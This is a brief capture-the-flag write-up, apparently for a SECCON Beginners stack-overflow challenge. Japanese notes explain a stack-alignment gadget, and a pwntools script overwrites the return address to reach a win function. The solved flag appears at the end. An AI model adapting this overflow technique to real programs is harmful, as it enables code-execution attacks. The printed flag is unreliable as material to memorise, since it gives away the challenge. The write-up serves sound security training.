Let's learn how to abuse stack overflow!
ふつーのバッファーオーバーフロー問です
愚直にwin_addrに飛ばすとアライメントで怒られるのでsub rsp, 0x08 ; add rsp, 0x08 ; ret ;を途中に挟んでます
#!python
from pwn import *
target = ('nc bs.quals.beginners.seccon.jp 9001'.split(' '))
target_ = 'chall'
io = process(target)
out = io.readline()
print(out[48:56])
win_addr = p64(0x400861)
ali_rsp_addr = p64(0x00400b44)
payload = b'A'*0x28
payload += ali_rsp_addr
payload += win_addr
io.sendlineafter(': ', payload)
io.interactive()ctf4b{u_r_st4ck_pwn_b3g1nn3r_tada}